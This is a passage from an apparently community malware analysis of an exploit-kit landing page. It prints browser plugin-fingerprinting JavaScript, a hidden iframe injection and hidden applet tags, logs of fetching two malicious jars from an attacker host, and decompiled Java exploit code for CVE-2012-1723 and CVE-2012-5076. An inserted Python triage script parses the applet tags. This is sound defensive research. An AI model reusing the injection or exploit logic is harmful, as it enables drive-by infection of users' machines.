"]}}catch(e){}})();'));if(g.head.firstChild){g.head.insertBefore(c,g.head.firstChild)}else{g.head.appendChild(c)}g.head.removeChild(c)}catch(i){}if(g[a]&&g.isArray(g[a])){f.result=[].concat(g[a])}}return f.result}}},applet:{$:1,results:[[null,null],[null,null],[null,null]],getResult:function(){var c=this.results,a,b=[];for(a=0;a<c.length;a++){b=c[a];if(b[0]){break}}return[].concat(b)},HTML:[0,0,0],active:[0,0,0],DummyObjTagHTML:0,DummySpanTagHTML:0,allowed:[1,1,1],VerifyTagsHas:function(c){var d=this,b;for(b=0;b<d.allowed.length;b++){if(d.allowed[b]===c){return 1}}return 0},saveAsVerifyTagsArray:function(c){var b=this,d=b.$,a;if(d.isArray(c)){for(a=0;a<b.allowed.length;a++){if(d.isNum(c[a])){if(c[a]<0){c[a]=0}if(c[a]>3){c[a]=3}b.allowed[a]=c[a]}}}},setVerifyTagsArray:function(d){var b=this,c=b.$,a=b.$$;if(a.getVersionDone===null){b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())}if(a.debug||(a.verify&&a.verify.isEnabled())){b.saveAsVerifyTagsArray([3,3,3])}else{if(d){b.saveAsVerifyTagsArray(d)}}},allDisabled:function(){return this.$$.isDisabled.allApplets()},isDisabled:function(d){var b=this,c=b.$,a=b.$$;if(d==2&&!c.isIE){return 1}if(d===0||d==2){return a.isDisabled.ObjectTag()}if(d==1){return a.isDisabled.AppletTag()}},can_Insert_Query:function(b){var a=this;if(a.HTML[b]){return 0}return !a.isDisabled(b)},can_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.results.length;a++){if(b.can_Insert_Query(a)){return 1}}return 0},should_Insert_Query:function(d){var b=this,e=b.allowed,c=b.$,a=b.$$;if(!b.can_Insert_Query(d)){return 0}if(e[d]==3){return 1}if(e[d]==2.8&&!b.getResult()[0]){return 1}if(e[d]==2.5&&!a.lang.System.getProperty()[0]){return 1}if(e[d]==2.2&&!a.lang.System.getProperty()[0]&&!b.getResult()[0]){return 1}if(!a.nonAppletDetectionOk(a.version0)){if(e[d]==2){return 1}if(e[d]==1&&!b.getResult()[0]){return 1}}return 0},should_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.allowed.length;a++){if(b.should_Insert_Query(a)){return 1}}return 
0},query:function(f){var h,a=this,g=a.$,d=a.$$,i=null,j=null,b=a.results,c;if((b[f][0]&&b[f][1])||(d.debug&&d.OTF<3)){return}c=g.getDOMobj(a.HTML[f],true);if(c){try{i=g.getNum(c.getVersion()+" ");j=c.getVendor()+" ";c.statusbar(g.winLoaded?" ":" ")}catch(h){}if(i&&g.isStrNum(i)){b[f]=[i,j]}else{};try{if(g.isIE&&i&&c.readyState!=4){g.garbage=true;c.parentNode.removeChild(c)}}catch(h){}}},insert_Query_Any:function(){var d=this,i=d.$,e=d.$$,l=d.results,p=d.HTML,a="&nbsp;&nbsp;&nbsp;&nbsp;",g="A.class",m=i.file.getValid(e);if(!m){return d.getResult()}if(e.OTF<1){e.OTF=1}if(d.allDisabled()){return d.getResult()}if(e.OTF<1.5){e.OTF=1.5}var j=m.name+m.ext,h=m.path;var f=["archive",j,"code",g],c=["mayscript","true"],o=["scriptable","true"].concat(c),n=e.navigator,b=!i.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:e.mimeType[0];if(d.should_Insert_Query(0)){if(e.OTF<2){e.OTF=2};p[0]=i.isIE?i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e):i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e);l[0]=[0,0];d.query(0)}if(d.should_Insert_Query(1)){if(e.OTF<2){e.OTF=2};p[1]=i.isIE?i.insertHTML("applet",["alt",a].concat(c).concat(f),["codebase",h].concat(c),a,e):i.insertHTML("applet",["codebase",h,"alt",a].concat(c).concat(f),[].concat(c),a,e);l[1]=[0,0];d.query(1)}if(d.should_Insert_Query(2)){if(e.OTF<2){e.OTF=2};p[2]=i.isIE?i.insertHTML("object",["classid",e.classID],["codebase",h].concat(f).concat(o),a,e):i.insertHTML();l[2]=[0,0];d.query(2)}if(!d.DummyObjTagHTML&&!e.isDisabled.ObjectTag()){d.DummyObjTagHTML=i.insertHTML("object",[],[],a)}if(!d.DummySpanTagHTML){d.DummySpanTagHTML=i.insertHTML("",[],[],a)};var k=e.NOTF;if(e.OTF<3&&k.shouldContinueQuery()){e.OTF=3;k.onIntervalQuery=i.handler(k.$$onIntervalQuery,k);if(!i.winLoaded){i.WLfuncs0.push([k.winOnLoadQuery,k])}setTimeout(k.onIntervalQuery,k.intervalLength)};return d.getResult()}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,shouldContinueQuery:function(){var 
e=this,d=e.$,c=e.$$,b=c.applet,a;for(a=0;a<b.results.length;a++){if(b.HTML[a]&&!b.results[a][0]&&(b.allowed[a]>=2||(b.allowed[a]==1&&!b.getResult()[0]))&&e.isAppletActive(a)>=0){return 1}}return 0},isJavaActive:function(d){var f=this,c=f.$$,a,b,e=-9;for(a=0;a<c.applet.HTML.length;a++){b=f.isAppletActive(a,d);if(b>e){e=b}}return e},isAppletActive:function(c,a){var d=this,b=d.$$.applet.active;if(!a){b[c]=d.isAppletActive_(c)}return b[c]},isAppletActive_:function(d){var g=this,f=g.$,b=g.$$,l=b.navigator,a=b.applet,h=a.HTML[d],i,k,c=0,j=f.getTagStatus(h,a.DummySpanTagHTML,a.DummyObjTagHTML,g.count);if(j==-2){return -2}try{if(f.isIE&&f.verIE>=b.minIEver&&f.getDOMobj(h).object){return 1}}catch(i){}for(k=0;k<a.active.length;k++){if(a.active[k]>0){c=1}}if(j==1&&(f.isIE||((b.version0&&l.javaEnabled()&&l.mimeObj&&(h.tagName=="object"||c))||b.lang.System.getProperty()[0]))){return 1}if(j<0){return -1}return 0},winOnLoadQuery:function(c,d){var b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();d.queryCompleted(a[1],a[2])}},$$onIntervalQuery:function(d){var c=d.$,b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();if(!d.shouldContinueQuery()||(c.winLoaded&&d.count>d.countMax)){d.queryCompleted(a[1],a[2])}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},queryAllApplets:function(){var g=this,f=g.$,e=g.$$,d=e.applet,b,a,c;for(b=0;b<d.results.length;b++){d.query(b)}a=d.getResult();c=a[0]?true:false;return[c,a[0],a[1]]},queryCompleted:function(c,f){var e=this,d=e.$,b=e.$$;if(b.OTF>=4){return}b.OTF=4;var a=e.isJavaActive();b.setPluginStatus(c,f,0);if(b.funcs){d.callArray(b.funcs)}if(d.onDoneEmptyDiv){d.onDoneEmptyDiv()}}},zz:0},adobereader:{mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"],classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",INSTALLED:{},pluginHasMimeType:function(d,c,f){var b=this,e=b.$,a;for(a in d){if(d[a]&&d[a].type&&d[a].type==c){return 1}}if(e.getMimeEnabledPlugin(c,f)){return 1}return 0},getVersion:function(l,j){var 
g=this,d=g.$,i,f,m,n,b=null,h=null,k=g.mimeType,a,c;if(d.isString(j)){j=j.replace(/\s/g,"");if(j){k=j}}else{j=null}if(d.isDefined(g.INSTALLED[k])){g.installed=g.INSTALLED[k];return}if(!d.isIE){a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";if(g.getVersionDone!==0){g.getVersionDone=0;b=d.getMimeEnabledPlugin(g.mimeType,a);if(!j){n=b}if(!b&&d.hasMimeType(g.mimeType)){b=d.findNavPlugin(a,0)}if(b){g.navPluginObj=b;h=d.getNum(b.description)||d.getNum(b.name);h=d.getPluginFileVersion(b,h);if(!h&&d.OS==1){if(g.pluginHasMimeType(b,"application/vnd.adobe.pdfxml",a)){h="9"}else{if(g.pluginHasMimeType(b,"application/vnd.adobe.x-mars",a)){h="8"}}}}}else{h=g.version}if(!d.isDefined(n)){n=d.getMimeEnabledPlugin(k,a)}g.installed=n&&h?1:(n?0:(g.navPluginObj?-0.2:-1))}else{b=d.getAXO(g.progID[0])||d.getAXO(g.progID[1]);c=/=\s*([\d\.]+)/g;try{f=(b||d.getDOMobj(d.insertHTML("object",["classid",g.classID],["src",""],"",g))).GetVersions();for(m=0;m<5;m++){if(c.test(f)&&(!h||RegExp.$1>h)){h=RegExp.$1}}}catch(i){}g.installed=h?1:(b?0:-1)}if(!g.version){g.version=d.formatNum(h)}g.INSTALLED[k]=g.installed}},zz:0}};actojack.initScript();jimyjoke = actojack.getVersion("Java");if (typeof jimyjoke == "string") {jimyjoke = jimyjoke.split(",");if (jimyjoke[3].length == 1) {jimyjoke = "" + jimyjoke[1] + "0" + jimyjoke[3];} else {jimyjoke = "" + jimyjoke[1] + jimyjoke[3];}} else {jimyjoke = 0;}pdfver = actojack.getVersion("AdobeReader");if (typeof pdfver == "string") {pdfver = pdfver.split(",");pdfver[3] = pdfver[3].substring(0, 1);pdfver = parseInt(pdfver.join(""), 10);} else {pdfver = 0;}
  83.         function ifr(abc) {var dh = document.createElement("iframe");dh.setAttribute("width", 1);dh.setAttribute("height", 1);dh.setAttribute("src", abc);document.body.appendChild(dh);};function pdf(){try{if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301)){ifr("lacecape.php");}} catch(e){}}setTimeout(pdf,2110);</script></html>
  84.  
  85. // see the applet headers: there are only 2 downloads on the landing page, both leading to jars...
  86.  
  87. ================================================================================
  88.  
  89. //=====================
  90. //THE FIRST JAR..
  91. //=====================
  92.  
  93. // let's go to the first applet:
  94.  
  95. <applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
  96. <param name="bhjwfffiorjwe" value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp">
  97. </applet>
  98.  
  99. // this leads to the jar with the below Urls,
  100. // passing the bhjwfffiorjwe params to the ors.class to be processed..
  101.  
  102. // let's fetch the h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/jimmdemy.jar
  103.  
  104. --18:33:00--  h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/jimmdemy.jar
  105.            => `jimmdemy.jar'
  106. Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
  107. Caching davidsonfrc89.net => 217.23.6.57
  108. Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
  109.  :
  110. GET /Jdowu32ds2s/rgerding/jimmdemy.jar HTTP/1.0
  111. User-Agent: #MalwareMustDie Playing with your jars
  112. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
  113. n;q=0.8,image/png,*/*;q=0.5
  114. Host: davidsonfrc89.net
  115. Connection: Keep-Alive
  116. Accept-Language: en-us,en;q=0.5
  117. Accept-Encoding: gzip,deflate
  118. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  119. Keep-Alive: 300
  120. HTTP request sent, awaiting response...
  121.  :
  122. HTTP/1.1 200 OK
  123. Server: nginx/1.2.6
  124. Date: Tue, 08 Jan 2013 09:32:58 GMT
  125. Content-Type: application/x-java-archive
  126. Content-Length: 9465
  127. Connection: keep-alive
  128. Last-Modified: Sun, 30 Dec 2012 11:22:55 GMT
  129. ETag: "39a0afc-24f9-4d2101e35e1c0"
  130. Accept-Ranges: bytes
  131.  :
  132. 200 OK
  133. Registered socket 1896 for persistent reuse.
  134. Length: 9,465 (9.2K) [application/x-java-archive]
  135. 100%[====================================>] 9,465         27.48K/s
  136. 18:33:01 (27.40 KB/s) - `jimmdemy.jar' saved [9465/9465]
  137.  
  138. //FIRST JAR's Malicious Activity quick analysis
  139. // Exploit used: CVE-2012-1723
  140.  
  141. // grab the passed applet parameter here;
  142. // ors.class
  143. import java.applet.Applet;
  144. import java.lang.reflect.Method;
  145.  
  146. public class ors extends Applet
  147. { public static String B;
  148.   public static String M;
  149.   public static String C = G.L("*_uR+P*Q)O5Wc").replace(G.L("T)R*Q(S5O-"), G.L(" Sv"));
  150.   public static String[] I;
  151.  
  152. // processing & calling G.class...
  153. public static Object L(String a, String a, Object a)
  154.   {  try
  155.     { String str1 = G.L("tR+^+P(~t\017uR+^&Q&R+P$\\'Z'Q*R\004\017z^&P(Q$\\'Z+P$Q&]*P\036b\025");
  156.       Object localObject = G.L("tR+^+P(~t\017uR+^&Q&R+P$\\'Z'Q*R\004\017z^&P(Q$\\'Z+P$Q&]*P\036b\025");
  157.       localObject = G.L("\016-Q*R\004\016u\017(Q$\\+E(R+P$\\'Z'R+^&Q*R\004P(E{b\004Q*^+\\'P*b\025");
  158.       localObject = Class.forName(a);
  159.       String str2 = G.L("");
  160.       int tmp41_40 = 1; tmp41_40; a = a.getMethod(new Class[0], tmp41_40);
  161.       localObject = G.L("\003(Q*R\004\016uQ*R\004\016uQ*R\004\016uQuR+^&Q$\\(Q*^&] ](Q*^&] ]+P(~{qxQ$\\'Z&^+P(E(P+^&\001\004|x\003{");
  162.       int tmp61_60 = 1; tmp61_60; return a.invoke(new Object[0], tmp61_60);
  163.           :
  164.  
  165. // here's where the exploit lives...
  166. // G.class :
  167. import java.io.InputStream;
  168. import java.security.ProtectionDomain;
  169.  
  170. public class G extends ClassLoader //<== note the ClassLoader subclass, a pattern of CVE-2012-1723
  171.      :
  172.  
  173.   public static String L(String a)
  174.   { int tmp5_4 = 4;                   // forming the public static String to be mapped into memory...
  175.     int tmp31_28 = a.length();
  176.     int tmp35_34 = 1;
  177.     tmp35_34;
  178.     int j;
  179.     int ? = tmp35_34;
  180.     int k = tmp31_28;
  181.     int tmp45_41 = (j = new char[tmp31_28] - 1);
  182.     tmp45_41;
  183.     int i = (0x3 ^ 0x5) << 3 ^ (0x3 ^ 0x5);
  184.     if ((4 << 3 ^ 0x1) >= 0)
  185.     { int tmp54_53 = j;             // several attempts at planting it in memory..
  186.       j--;
  187.       ?[tmp54_53] = (char)(a.charAt(tmp54_53) ^ i);
  188.       int tmp72_71 = j;
  189.       j--;
  190.       ?[tmp72_71] = (char)(a.charAt(tmp72_71) ^ k);
  191.     }
  192.     tmp45_41.<init>(?);
  193.     return tmp5_4 << tmp5_4 ^ (0x3 ^ 0x5) << 1;    }
  194.  
  195.  
  196. // act of security bypass to download+save payloads...
  197.  
  198. public static void L(G a)
  199.   {  try
  200.     {  String str = G.L("tR+^&Q*R$Q&]*P\036b\025");
  201.       InputStream tmp16_13 =
  202.         a.getResourceAsStream(m.L("V'RqT3V,D"));
  203.       int i;
  204.       int tmp25_24 = 1; tmp25_24;
  205.       int ?;
  206.       Object localObject = K.L();
  207.       new byte[
  208.         i = tmp16_13.available()]
  209.         .read(? = tmp25_24,
  210.         0, i);
  211.       int tmp43_42 = ?;
  212.       localObject = G.L(
  213.         tmp16_13
  214.         .defineClass("axe", tmp43_42, 0, tmp43_42.length, (ProtectionDomain)localObject));// <=== here
  215.       return;
  216.             a;    }
  217.     catch (Exception localException1){}} // the local exception wasn't defined..
  218.  
  219.  
  220. // what's in the axe.class?
  221. // the saving of payload via localObject3 by new FileOutputStream
  222. // using strings formed by localObject2 & localObject2
  223.  
  224. import java.io.FileOutputStream;
  225. import java.io.InputStream;
  226. import java.security.PrivilegedExceptionAction;
  227.  
  228. public class axe
  229.   implements PrivilegedExceptionAction
  230.   {
  231.   public Object run()
  232.   {
  233.     String[] arrayOfString;
  234.     Object localObject1;
  235.     Object localObject2;
  236.     InputStream localInputStream;
  237.     try
  238.     {
  239.       String str1 = L();
  240.       arrayOfString = ors.I;
  241.       localObject1 = G.L("P*^*^*Q(P)R*Q$P+R*S(P+^*Q(P)R*Q(S5O-");
  242.       localObject1 = G.L("P*^*^*Q(P)R*Q$P+R*S(P+^*Q(P)R*Q(S5O-");
  243.       long l = System.currentTimeMillis();
  244.       localObject1 = G.L(")N)");
  245.       new StringBuilder();
  246.       int tmp59_58 = 1; tmp59_58;
  247.       int tmp61_59 = tmp59_58; tmp61_59[0] = Long.valueOf(l); String str4 = String.format(new Object[1], tmp61_59);
  248.       String str2 = G.L("U!Rb\023?\026cUlE8W>Bl");
  249.       int tmp87_86 = 1; tmp87_86;
  250.       int tmp89_87 = tmp87_86; tmp89_87[0] = localObject1; str2 = String.format(new Object[1], tmp89_87);
  251.       String str3 = G.L("P*^*^*Q(P+W(P+T)R*Q(S5O-");
  252.       localObject2 = G.L("*P$P$P+W(P+T)R*Q(S5O-");
  253.       localObject2 = localObject1 + str4;
  254.       localInputStream = A(arrayOfString[localObject1.intValue()]);
  255.  
  256.       Object localObject3 = new FileOutputStream((String)(String)localObject2);
  257.       int tmp198_197 = 1; tmp198_197; int ? = tmp198_197;
  258.       int i;
  259.       while ((i = localInputStream.read(?, 0, ?.length)) != -1)
  260.       {  ((FileOutputStream)localObject3).write(?, 0, i);
  261.         tmpTernaryOp = localInputStream;
  262.         continue;
  263.         new byte[1024];
  264.       }
  265.       localInputStream.close();
  266.       Object tmp243_241 = localObject3; tmp243_241.flush(); tmp243_241.close();
  267.  
  268.       M((String)(String)
  269.         (localObject3 = (String)(String)localObject2));
  270.       localObject3 = localObject1 = Integer.valueOf((localObject2 = localObject1)
  271.         .intValue() + 1);
  272.       localObject3 = localObject2;
  273.       (localInputStream = A(localObject2 = ""))
  274.         .close();
  275.       tmpTernaryOp = 0;    }
  276.     catch (Exception localException1)  {    }
  277.     return null; }
  278.  
  279.  
  280. //================================
  281.  
  282. //THE SECOND JAR..CVE-2012-5076
  283.  
  284. //================================
  285.  
  286. // the other jar was downloaded here:
  287.  
  288. //also fetch the h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/torylane.jar
  289.  
  290. --18:36:03--  h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/torylane.jar
  291.            => `torylane.jar'
  292. Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
  293. Caching davidsonfrc89.net => 217.23.6.57
  294. Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
  295.  :
  296. GET /Jdowu32ds2s/rgerding/torylane.jar HTTP/1.0
  297. User-Agent: #MalwareMustDie has to change the train....
  298. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
  299. n;q=0.8,image/png,*/*;q=0.5
  300. Host: davidsonfrc89.net
  301. Connection: Keep-Alive
  302. Accept-Language: en-us,en;q=0.5
  303. Accept-Encoding: gzip,deflate
  304. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  305. Keep-Alive: 300
  306.  :
  307. HTTP request sent, awaiting response...
  308.  :
  309. HTTP/1.1 200 OK
  310. Server: nginx/1.2.6
  311. Date: Tue, 08 Jan 2013 09:36:01 GMT
  312. Content-Type: application/x-java-archive
  313. Content-Length: 5502
  314. Connection: keep-alive
  315. Last-Modified: Tue, 25 Dec 2012 05:55:36 GMT
  316. ETag: "39a0afd-157e-4d1a6f66da600"
  317. Accept-Ranges: bytes
  318.  :
  319. 200 OK
  320. Registered socket 1896 for persistent reuse.
  321. Length: 5,502 (5.4K) [application/x-java-archive]
  322. 100%[====================================>] 5,502         18.72K/s
  323. 18:36:04 (18.70 KB/s) - `torylane.jar' saved [5502/5502]
  324.  
  325.  
  326. MD5:    ae66fc69244abec22f20384356806ad2
  327. File size:      5.4 KB ( 5502 bytes )
  328. File name:      torylane.jar
  329. File type:      JAR
  330. Detection ratio:        1 / 46
  331. Analysis date:  2013-01-08 12:50:22 UTC ( 0 分 ago )
  332. https://www.virustotal.com/file/92ad670f3d32c91afffc60c54e9c5d19095d827ec86d2d89ebfa0a7856fa93e8/analysis/1357649422/
  333.  
  334.  
  335. // applet params passed:
  336.  
  337. <applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
  338. <param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp">
  339. </applet>
  340.  
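Both applets above (ors.class in jimmdemy.jar and gee.class in torylane.jar) share the same shape: a 1x1 applet, a relative archive path, and one long opaque param that the applet class decodes itself. The script below is an added triage example for this write-up, not code from the landing page or the kit: it pulls every applet and its params out of the HTML, resolves the archive to the URL the browser would fetch, and flags the hidden size and the high-entropy param. The HTML fragment is constructed from the two applet tags shown on this page; the landing-page URL (the `Jdowu32ds2s/index.php` path) is an assumption, since only the jar URLs appear on the page.

```python
"""Triage the <applet> tags of an exploit-kit landing page.

Added example for this write-up (not code from the landing page or the kit):
extract each applet's class, archive and size plus its <param> values, resolve
the archive to the URL the browser would request, and flag the traits both
applets above share: a 1x1 applet and a long, high-entropy param that the
applet class decodes itself.  LANDING_HTML is CONSTRUCTED from the two applet
tags shown on this page; LANDING_URL is an ASSUMPTION (only the jar URLs are
on the page, so the landing page is assumed to sit one level above them).
"""
import math
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample: the two applet tags from the write-up, verbatim.
LANDING_HTML = """<html><body>
<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
<param name="bhjwfffiorjwe" value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp">
</applet>
<applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
<param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp">
</applet>
</body></html>"""

# ASSUMED landing-page URL; "h00p" is the write-up's defanged scheme.
LANDING_URL = "h00p://davidsonfrc89.net/Jdowu32ds2s/index.php"


def refang(url):
    """urljoin only resolves relative paths for real schemes, so refang first."""
    return url.replace("h00p://", "http://").replace("hxxp://", "http://")


def defang(url):
    return url.replace("http://", "h00p://")


def entropy(s):
    """Shannon entropy in bits per character (0.0 for an empty string)."""
    n = len(s)
    if not n:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def _small(dim):
    """True for a width/height of 0 or 1 pixel (the classic hidden applet)."""
    try:
        return int(dim) <= 1
    except (TypeError, ValueError):
        return False


class AppletParser(HTMLParser):
    """Collect <applet> tags and the <param> tags nested inside them."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "applet":
            self._cur = {"code": a.get("code"), "archive": a.get("archive"),
                         "width": a.get("width"), "height": a.get("height"),
                         "params": {}}
            self.applets.append(self._cur)
        elif tag == "param" and self._cur is not None:
            self._cur["params"][a.get("name")] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "applet":
            self._cur = None


def triage(html, landing_url, min_len=200, min_entropy=3.5):
    """One finding per applet: fetch URL, hidden flag, opaque param names."""
    parser = AppletParser()
    parser.feed(html)
    base = refang(landing_url)
    findings = []
    for ap in parser.applets:
        opaque = sorted(name for name, val in ap["params"].items()
                        if len(val) >= min_len and entropy(val) >= min_entropy)
        findings.append({
            "code": ap["code"],
            "archive_url": defang(urljoin(base, ap["archive"])) if ap["archive"] else None,
            "hidden": _small(ap["width"]) and _small(ap["height"]),
            "opaque_params": opaque,
        })
    return findings


if __name__ == "__main__":
    for finding in triage(LANDING_HTML, LANDING_URL):
        print(finding)
```

The resolved archive URLs come out as the two jar URLs fetched in this write-up, which is the quick way to confirm that a captured landing page and a captured jar belong together; the entropy threshold is a triage heuristic, not a verdict, and a param that fails it still deserves a look if the applet is hidden.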
  341. // the gee.class... the passed applet params go here...
  342. import java.applet.Applet;
  343. import java.io.InputStream;
  344. import java.lang.reflect.Constructor;
  345. import java.lang.reflect.Method;
  346.  
  347. public class gee extends Applet
  348.   public static java.net.URL g(String a) // <==== see the "a" object = url..
  349.   {
  350.  
  351. // pet.class... the url logic builder
  352.  
  353. import java.security.PrivilegedExceptionAction; // Attempt to use Security exception...
  354.  
  355. public class pet
  356.   implements PrivilegedExceptionAction {} // Security exception performed...
  357.    public static String A(String a)       //here!
  358.     {
  359.     int tmp25_22 = a.length();
  360.     int tmp29_28 = 1;
  361.     tmp29_28;
  362.     int j;
  363.     int ? = tmp29_28;
  364.     int k = tmp25_22;
  365.     int tmp39_35 = (j = new char[tmp25_22] - 1);
  366.     tmp39_35;
  367.     int i = 4;
  368.     ((0x3 ^ 0x5) << 3 ^ (0x2 ^ 0x5));
  369.     if (tmp39_35 >= 0)
  370.     {
  371.       int tmp49_48 = j;
  372.       j--;
  373.       ?[tmp49_48] = (char)(a.charAt(tmp49_48) ^ i);
  374.       int tmp67_66 = j;
  375.       j--;
  376.       ?[tmp67_66] = (char)(a.charAt(tmp67_66) ^ k);
  377.     }
  378.     ((0x3 ^ 0x5) << 4 ^ 0x1).<init>(?);
  379.     return new java/lang/String;  }
  380.  
  381. //calling zin.class & pet.class for string builder...
  382.    public static Object A(Class a)
  383.    {
  384.     String str1 = pet.A("Pl]cQ`\017bP`QcQ`P`Pl]cQ`lQ`P");
  385.     str1 = zin.A("-\037&\035<\017&5?\031&");
  386.     String str2 = pet.A("c_nPbS<QcSbSbPbScScQ`P`Pl]cQ`lQ`P");
  387.     str1 = new StringBuffer(str1).reverse().toString();
  388.     str2 = zin.A("");
  389.     return A(pet.A("]eAe\031hVjP*thVwD"), str1, a);
  390.  
  391. // zin.class... builds the saved-file string... HERE GOES THE PAYLOAD LOGIC
  392.  
  393. import java.io.FileOutputStream;
  394. import java.io.InputStream;
  395.    :
  396.  Object localObject3 = new FileOutputStream((String)localObject1);
  397.       int tmp170_169 = 1; tmp170_169; int ? = tmp170_169;
  398.       int i;
  399.       while ((i = localInputStream.read(?, 0, ?.length)) != -1)
  400.       { ((FileOutputStream)localObject3).write(?, 0, i);
  401.         tmpTernaryOp = localInputStream;
  402.         continue;
  403.         new byte[1024];    }
  404.  
  405. // K.class has the exploit:
  406. public class K
  407. {
  408.   public static String c;
  409.   public static String J;
  410.   public static String l;
  411.   public static String F;
  412.   public static String h;
  413.   public static String d;
  414.  
  415. static
  416.   { // classes to attack the Java security model, typical CVE-2012-5076
  417.     K.h = "com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory";
  418.     K.l = "com.sun.org.glassfish.gmbal.util.GenericConstructor";
  419. // Exploit strings
  420.     K.J = new StringBuffer(zin.A("\016-\030)\023\004\017;\035$?;\t'\0211\022'\022\tR&\023&\035f\031#\023>\022!R&\t;")).reverse().toString();
  421. // Obfuscation of the method names...
  422.     K.F = "create";
  423.     K.d = "loadClass"; // loadClass method to load a malicious payload class....
  424.     K.c = "getMethod";
  425.    
